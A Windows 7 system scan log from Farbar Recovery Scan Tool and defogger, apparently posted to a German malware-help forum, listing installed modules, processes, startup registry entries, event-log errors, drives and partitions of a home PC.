2005-04-06 16:53 - 2005-04-06 16:53 - 00032880 _____ () C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\jre\bin\nio.dll
2005-04-06 16:53 - 2005-04-06 16:53 - 00434255 _____ () C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\bin\ps-rw-vc-v8_58.dll
2005-04-06 16:53 - 2005-04-06 16:53 - 01019904 _____ () C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\bin\ps-vc-v8_58.dll
2012-11-28 14:13 - 2012-11-28 14:13 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2012-11-28 14:13 - 2012-11-28 14:13 - 01242512 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-05-28 19:47 - 2011-08-23 09:04 - 00057344 _____ () C:\Program Files (x86)\WinTV\TVServer\libhdhomerun.dll
2012-05-28 17:02 - 2012-01-16 16:12 - 00018944 _____ () C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServerps.dll
2009-02-03 02:33 - 2009-02-03 02:33 - 00460199 _____ () C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\sqlite3.dll
2010-05-06 03:24 - 2010-05-06 03:24 - 00151584 _____ () C:\Program Files (x86)\Acer\Hotkey Utility\HotkeyHook.dll
2010-12-25 20:53 - 2006-01-12 21:20 - 00019968 _____ () C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Distillr\acrotray.deu
2010-12-25 20:53 - 2006-01-12 21:13 - 00019968 _____ () C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Distillr\acrotray.FRA
2010-12-18 20:25 - 2009-02-27 16:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2007-08-31 17:13 - 2007-08-31 17:13 - 01336600 _____ () C:\Program Files (x86)\Acronis\TrueImageHome\fox.dll
2011-07-29 00:09 - 2011-07-29 00:09 - 00096112 _____ () C:\Program Files (x86)\DivX\DivX Update\DivXUpdateCheck.dll
2008-09-29 02:55 - 2008-09-29 02:55 - 01076224 _____ () C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\ACE.dll
2013-10-19 00:55 - 2013-10-19 00:55 - 25100288 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\libcef.dll
2014-01-08 11:15 - 2010-09-17 09:00 - 12832768 _____ () C:\Program Files (x86)\Common Files\PDFCreator\GS9.00\gs9.00\Bin\gsdll32.dll
2013-12-12 07:59 - 2013-12-12 07:59 - 03559024 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll

==================== Alternate Data Streams (whitelisted) =========

AlternateDataStreams: C:\ProgramData\Temp:CB0AACC9

==================== Safe Mode (whitelisted) ===================


==================== Faulty Device Manager Devices =============

Name: Standardtastatur (PS/2)
Description: Standardtastatur (PS/2)
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standardtastaturen)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: Microsoft PS/2-Maus
Description: Microsoft PS/2-Maus
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Event log errors: =========================

Application errors:
==================
Error: (01/15/2014 08:11:12 AM) (Source: SideBySide) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "assemblyIdentity1". Fehler in Manifest- oder Richtliniendatei "assemblyIdentity2" in Zeile assemblyIdentity3.
Der Wert "MAJOR_VERSION.MINOR_VERSION.BUILD_NUMBER_MAJOR.BUILD_NUMBER_MINOR" des "version"-Attributs im assemblyIdentity-Element ist ungültig.

Error: (01/15/2014 07:17:22 AM) (Source: Bonjour Service) (User: )
Description: mDNSCoreReceiveResponse: Unexpected conflict discarding   17 66.178.168.192.in-addr.arpa. PTR *****-PC.local.

Error: (01/15/2014 07:17:22 AM) (Source: Bonjour Service) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.178.66:5353   19 66.178.168.192.in-addr.arpa. PTR *****-PC-2.local.

Error: (01/14/2014 07:14:50 PM) (Source: Bonjour Service) (User: )
Description: mDNSCoreReceiveResponse: Unexpected conflict discarding   17 66.178.168.192.in-addr.arpa. PTR *****-PC.local.

Error: (01/14/2014 07:14:50 PM) (Source: Bonjour Service) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.178.66:5353   19 66.178.168.192.in-addr.arpa. PTR *****-PC-2.local.

Error: (01/14/2014 07:11:51 PM) (Source: Bonjour Service) (User: )
Description: mDNSCoreReceiveResponse: Unexpected conflict discarding   17 66.178.168.192.in-addr.arpa. PTR *****-PC.local.

Error: (01/14/2014 07:11:51 PM) (Source: Bonjour Service) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.178.66:5353   19 66.178.168.192.in-addr.arpa. PTR *****-PC-2.local.

Error: (01/14/2014 07:35:47 AM) (Source: SideBySide) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "assemblyIdentity1". Fehler in Manifest- oder Richtliniendatei "assemblyIdentity2" in Zeile assemblyIdentity3.
Der Wert "MAJOR_VERSION.MINOR_VERSION.BUILD_NUMBER_MAJOR.BUILD_NUMBER_MINOR" des "version"-Attributs im assemblyIdentity-Element ist ungültig.

Error: (01/14/2014 06:28:04 AM) (Source: Bonjour Service) (User: )
Description: mDNSCoreReceiveResponse: Unexpected conflict discarding   17 66.178.168.192.in-addr.arpa. PTR *****-PC.local.

Error: (01/14/2014 06:28:04 AM) (Source: Bonjour Service) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.178.66:5353   19 66.178.168.192.in-addr.arpa. PTR *****-PC-2.local.


System errors:
=============
Error: (01/15/2014 07:38:11 AM) (Source: Service Control Manager) (User: )
Description: Der Dienst "NVIDIA Update Service Daemon" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1069

Error: (01/15/2014 07:38:11 AM) (Source: Service Control Manager) (User: )
Description: Der Dienst "nvUpdatusService" konnte sich nicht als ".\UpdatusUser" mit dem aktuellen Kennwort aufgrund des folgenden Fehlers anmelden: 
%%1330

Vergewissern Sie sich, dass der Dienst richtig konfiguriert ist im Dienste-Snap-In in der Microsoft Management Console (MMC).

Error: (01/15/2014 07:34:25 AM) (Source: Ntfs) (User: )
Description: Auf dem Volume "\\?\Volume{10027dd9-c2d9-11e1-a534-806e6f6e6963}" konnte der Transaktionsressourcen-Manager aufgrund eines nicht wiederholbaren Fehlers nicht gestartet werden. Der Fehlercode ist in den Daten enthalten.

Error: (01/15/2014 07:19:55 AM) (Source: Service Control Manager) (User: )
Description: Der Dienst "NVIDIA Update Service Daemon" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1069

Error: (01/15/2014 07:19:55 AM) (Source: Service Control Manager) (User: )
Description: Der Dienst "nvUpdatusService" konnte sich nicht als ".\UpdatusUser" mit dem aktuellen Kennwort aufgrund des folgenden Fehlers anmelden: 
%%1330

Vergewissern Sie sich, dass der Dienst richtig konfiguriert ist im Dienste-Snap-In in der Microsoft Management Console (MMC).

Error: (01/15/2014 07:17:53 AM) (Source: Service Control Manager) (User: )
Description: Der Dienst "Windows Media Center TV Archive Transfer Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1053

Error: (01/15/2014 07:17:53 AM) (Source: Service Control Manager) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst Windows Media Center TV Archive Transfer Service erreicht.

Error: (01/15/2014 07:16:45 AM) (Source: Ntfs) (User: )
Description: Auf dem Volume "\\?\Volume{10027dd9-c2d9-11e1-a534-806e6f6e6963}" konnte der Transaktionsressourcen-Manager aufgrund eines nicht wiederholbaren Fehlers nicht gestartet werden. Der Fehlercode ist in den Daten enthalten.

Error: (01/14/2014 07:15:02 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "Server" wurde mit folgendem Fehler beendet: 
%%13

Error: (01/14/2014 07:15:00 PM) (Source: Microsoft Antimalware) (User: )
Description: Vom Echtzeitschutz-Feature von %%860 wurde ein Fehler festgestellt

	Feature: %%886

	Fehlercode: 0x8007045b

	Fehlerbeschreibung: Der Computer wird heruntergefahren. 

	Grund: %%892


Microsoft Office Sessions:
=========================
Error: (01/27/2012 03:16:14 AM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.6654.5003, Microsoft Office Version: 12.0.6612.1000. This session lasted 141973 seconds with 60 seconds of active time.  This session ended with a crash.

Error: (01/16/2012 02:17:20 PM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.6654.5003, Microsoft Office Version: 12.0.6612.1000. This session lasted 372467 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (10/07/2011 01:39:13 PM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 14856 seconds with 240 seconds of active time.  This session ended with a crash.

Error: (10/07/2011 07:18:14 AM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6562.5003, Microsoft Office Version: 12.0.6425.1000. This session lasted 65 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (10/07/2011 07:04:15 AM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6562.5003, Microsoft Office Version: 12.0.6425.1000. This session lasted 89609 seconds with 4920 seconds of active time.  This session ended with a crash.

Error: (10/05/2011 11:24:33 AM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 14563 seconds with 60 seconds of active time.  This session ended with a crash.

Error: (10/04/2011 09:19:59 AM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 27 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (10/04/2011 09:19:21 AM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 95561 seconds with 1080 seconds of active time.  This session ended with a crash.

Error: (09/27/2011 01:21:34 PM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 338595 seconds with 360 seconds of active time.  This session ended with a crash.

Error: (09/19/2011 09:07:39 AM) (Source: Microsoft Office 12 Sessions)(User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 8 seconds with 0 seconds of active time.  This session ended with a crash.


==================== Memory info =========================== 

Percentage of memory in use: 47%
Total physical RAM: 6103.06 MB
Available physical RAM: 3217.85 MB
Total Pagefile: 12204.3 MB
Available Pagefile: 8446.18 MB
Total Virtual: 8192 MB
Available Virtual: 8191.8 MB

==================== Drives ================================

Drive c: (Acer) (Fixed) (Total:456.78 GB) (Free:240.97 GB) NTFS
Drive d: (Data) (Fixed) (Total:456.63 GB) (Free:312.72 GB) NTFS
Drive f: (SYSTEM RESERVED) (Fixed) (Total:0.03 GB) (Free:0 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive g: (AcerAlt) (Fixed) (Total:411.91 GB) (Free:105.53 GB) NTFS
Drive h: (DATAAlt) (Fixed) (Total:43.63 GB) (Free:30.32 GB) NTFS
Drive l: () (Removable) (Total:7.39 GB) (Free:7.39 GB) FAT32
Drive m: (Swap-M) (Fixed) (Total:1397.26 GB) (Free:479.25 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 932 GB) (Disk ID: C7CAF91E)
Partition 1: (Not Active) - (Size=18 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=457 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=457 GB) - (Type=OF Extended)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 466 GB) (Disk ID: B4768151)
Partition 1: (Not Active) - (Size=10 GB) - (Type=27)
Partition 2: (Active) - (Size=31 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=412 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=44 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (MBR Code: Windows 7 or 8) (Size: 1397 GB) (Disk ID: 9526035C)
Partition 1: (Active) - (Size=-698723860480) - (Type=07 NTFS)

========================================================
Disk: 5 (Size: 7 GB) (Disk ID: 00000000)
Partition 1: (Active) - (Size=7 GB) - (Type=0B)

==================== End Of Log ============================
         
defogger_disable.log
Code:
defogger_disable by jpshortstuff (23.02.10.1)
Log created at 08:42 on 15/01/2014 (*****)

Checking for autostart values...
HKCU\~\Run values retrieved.
HKLM\~\Run values retrieved.

Checking for services/drivers...


-=E.O.F=-
         
FRST.txt
Code:
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 15-01-2014
Ran by ***** (administrator) on *****-PC on 15-01-2014 08:44:36
Running from G:\Users\*****\Documents\***\***** Hacker\trojaner-board.de
Windows 7 Home Premium Service Pack 1 (X64) OS Language: German Standard
Internet Explorer Version 11
Boot Mode: Normal

The only official downoad link fo FRST:
Download link for 32-Bit version: hxxp://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ 
Download link for 64-Bit Version: hxxp://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ 
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSvc.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements Organizer 8.0\PhotoshopElementsFileAgent.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVM Berlin) C:\Program Files\FRITZ!Fernzugang\avmike.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(AVM Berlin) C:\Program Files\FRITZ!Fernzugang\certsrv.exe
(Devguru Co., Ltd.) C:\Windows\SysWOW64\dgdersvc.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\esClient.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\mwlDaemon.exe
() C:\HS3 Hotelsoftware\DB-Server\bin\fbguard_hs3sr.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Registration\GregHSRW.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe
(Microsoft Corporation) C:\Windows\vVX1000.exe
(Microsoft Corporation) C:\Windows\WindowsMobile\wmdc.exe
(Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServer.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Google Inc.) C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
() C:\Program Files (x86)\Acer\Hotkey Utility\HotkeyUtility.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec Egis Software Update\EgisUpdate.exe
(CyberLink Corp.) C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\ArcadeDeluxeAgent.exe
(Acer Corp.) C:\Program Files (x86)\Acer Arcade Deluxe\PlayMovie\PMVService.exe
(Adobe Sytems Incorporated) C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Distillr\acrotray.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe
() C:\ProgramData\DatacardService\HWDeviceService64.exe
() C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\data\database\bin\mysqld-nt.exe
(Acronis) C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe
(Acronis) C:\Program Files (x86)\Acronis\TrueImageHome\TimounterMonitor.exe
(Google) C:\Program Files (x86)\Google\Google Desktop Search\GoogleDesktop.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\ControlCenter3\BrccMCtl.exe
() C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brmfcmon\BrMfimon.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\MWLService.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(Audible, Inc.) C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe
() C:\Program Files (x86)\Northstar\SmartCopy\SmartCopy.exe
(North Star com.) C:\Program Files (x86)\Northstar\SmartLauncher\SmartLauncher.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\WHSTrayApp.exe
(Hauppauge Computer Works, Inc.) C:\Program Files (x86)\WinTV\WinTV7\WinTVTray.exe
(Dropbox, Inc.) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe
(AVM Berlin) C:\Program Files\FRITZ!Fernzugang\nwtsrv.exe
(pdfforge  hxxp://www.pdfforge.org/) C:\Program Files (x86)\Common Files\PDFCreator\PDFCreator.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
() C:\Program Files (x86)\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe
(Acer) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
() C:\OEM\USBDECTION\USBS3S4Detection.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\Microsoft.HomeServer.Archive.TransferService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\WHSConnector.exe
(Firebird Project) C:\HS3 Hotelsoftware\DB-Server\bin\fbserver_hs3sr.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Helios Software Solutions) C:\Program Files (x86)\TextPad 4\TextPad.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft LifeCam\LifeTray.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft LifeCam\LifeEnC2.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [mwlDaemon] - C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\mwlDaemon.exe [349480 2009-09-10] (Egis Technology Inc.)
HKLM\...\Run: [IAAnotif] - C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe [186904 2009-10-13] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] - C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [8312352 2009-10-28] (Realtek Semiconductor)
HKLM\...\Run: [OOTag] - C:\windows\oobeoffer\oobeoffer\ootag.exe [23072 2009-09-28] (Microsoft)
HKLM\...\Run: [Acronis Scheduler2 Service] - C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe [140568 2007-08-31] (Acronis)
HKLM\...\Run: [VX1000] - C:\Windows\vVX1000.exe [762736 2010-05-20] (Microsoft Corporation)
HKLM\...\Run: [Windows Mobile Device Center] - C:\Windows\WindowsMobile\wmdc.exe [660360 2007-05-31] (Microsoft Corporation)
HKLM\...\Run: [MSC] - C:\Program Files\Microsoft Security Client\msseces.exe [1266912 2013-10-23] (Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [472992 2013-03-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [JMB36X IDE Setup] - C:\Windows\RaidTool\xInsIDE.exe [36864 2007-03-20] ()
HKLM-x32\...\Run: [BackupManagerTray] - C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [261888 2009-08-12] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [Hotkey Utility] - C:\Program Files (x86)\Acer\Hotkey Utility\HotkeyUtility.exe [609312 2010-05-06] ()
HKLM-x32\...\Run: [EgisTecLiveUpdate] - C:\Program Files (x86)\EgisTec Egis Software Update\EgisUpdate.exe [199464 2009-08-04] (Egis Technology Inc.)
HKLM-x32\...\Run: [ArcadeDeluxeAgent] - C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\ArcadeDeluxeAgent.exe [128296 2009-11-16] (CyberLink Corp.)
HKLM-x32\...\Run: [PlayMovie] - C:\Program Files (x86)\Acer Arcade Deluxe\PlayMovie\PMVService.exe [181480 2009-11-12] (Acer Corp.)
HKLM-x32\...\Run: [TrayServer] - C:\Program Files (x86)\MAGIX\Video_deluxe_15\Trayserver.exe [90112 2008-08-07] (MAGIX AG)
HKLM-x32\...\Run: [Adobe Version Cue CS2] - C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe [856064 2005-04-06] (Adobe Sytems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 7.0] - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Distillr\acrotray.exe [483328 2008-04-23] (Adobe Systems Inc.)
HKLM-x32\...\Run: [] - [x]
HKLM-x32\...\Run: [BrMfcWnd] - C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1159168 2009-05-26] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [ControlCenter3] - C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [TrueImageMonitor.exe] - C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe [2622232 2007-08-31] (Acronis)
HKLM-x32\...\Run: [AcronisTimounterMonitor] - C:\Program Files (x86)\Acronis\TrueImageHome\TimounterMonitor.exe [907040 2007-08-31] (Acronis)
HKLM-x32\...\Run: [Google Desktop Search] - C:\Program Files (x86)\Google\Google Desktop Search\GoogleDesktop.exe [30192 2010-12-20] (Google)
HKLM-x32\...\Run: [LifeCam] - C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe [119152 2010-05-20] (Microsoft Corporation)
HKLM-x32\...\Run: [DivXUpdate] - C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [1259376 2011-07-29] ()
HKLM-x32\...\Run: [Adobe ARM] - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-05-11] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] - C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59280 2012-11-28] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] - C:\Program Files (x86)\iTunes\iTunesHelper.exe [152544 2012-12-12] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] - C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKCU\...\Run: [swg] - C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2009-11-18] (Google Inc.)
HKCU\...\Run: [updateMgr] - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Acrobat\AdobeUpdateManager.exe [313472 2006-03-30] (Adobe Systems Incorporated)
HKCU\...\Run: [KiesTrayAgent] - C:\Program Files (x86)\Samsung\Kies\/\KiesTrayAgent.exe [3365176 2010-05-14] (Samsung Electronics Co., Ltd.)
MountPoints2: {59c8f615-9a4a-11df-a62d-806e6f6e6963} - E:\wubi.exe
MountPoints2: {a6801d55-6f88-11e3-9574-90fba686407f} - I:\AutoRun.exe
MountPoints2: {a6801d61-6f88-11e3-9574-90fba686407f} - I:\AutoRun.exe
HKU\Admin\...\Run: [swg] - C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2009-11-18] (Google Inc.)
HKU\Default\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe [162336 2009-07-22] ()
HKU\Default User\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe [162336 2009-07-22] ()
HKU\UpdatusUser\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe [162336 2009-07-22] ()
AppInit_DLLs-x32: C:\PROGRA~2\Google\GOOGLE~3\GO36F4~1.DLL [123392 2010-12-20] (Google)
Lsa: [Authentication Packages] msv1_0 relog_ap
Startup: C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_m7811&r=17361210n705pe426v155w5741u221
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_m7811&r=17361210n705pe426v155w5741u221
SearchScopes: HKLM-x32 - DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deAT409AT409
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deAT409AT409
SearchScopes: HKCU - {70D46D94-BF1E-45ED-B567-48701376298E} URL = hxxp://127.0.0.1:4664/search&s=91Tr_Mru3RxUJoRgsGdwbizWUc8?q={searchTerms}
BHO: Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll (SEIKO EPSON CORPORATION / CyCom Technology Corp.)
BHO: BrowserHelper Class - {9A065C65-4EE7-4DDD-9918-F129089A894A} - C:\Program Files\Windows Home Server\WHSDeskBands.dll (Microsoft Corporation)
BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
